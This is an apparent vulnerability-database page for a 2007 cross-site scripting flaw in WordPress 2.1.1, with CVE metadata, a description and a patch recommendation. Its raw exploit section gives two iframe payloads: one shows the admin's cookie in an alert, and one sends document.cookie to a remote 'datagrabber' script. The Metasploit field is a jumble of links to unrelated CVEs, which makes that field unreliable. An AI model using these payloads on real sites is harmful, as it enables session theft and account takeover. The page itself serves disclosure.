header-logo
Suggest Exploit
vendor:
Wordpress
by:
Not specified
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Wordpress
Affected Version From: 2.1.2001
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2007-2022
CPE: a:wordpress:wordpress:2.1.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2022-41966/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-2007/https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-2007/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2022-2007/https://www.rapid7.com/db/vulnerabilities/microsoft-edge-cve-2022-2007/https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2022-2007/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-2007/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1090/https://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb07-12-cve-2007-2022/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0494/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0494/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-2022/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-2022/
Other Scripts:
Platforms Tested:
2007

Cross-Site Scripting in WordPress

The vulnerability allows an attacker to execute arbitrary script code in the browser of an unsuspecting user, potentially leading to the theft of authentication credentials and other attacks.

Mitigation:

Apply the latest security patches or upgrade to a non-affected version of Wordpress.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22735/info

Wordpress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Wordpress 2.1.1 is vulnerable to this issue; other versions may also be affected. 

Cookie in an Alert Box: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol= %27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);im age.src=%27http://www.example.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>

Navigation

Suggest Exploit

Services By CQR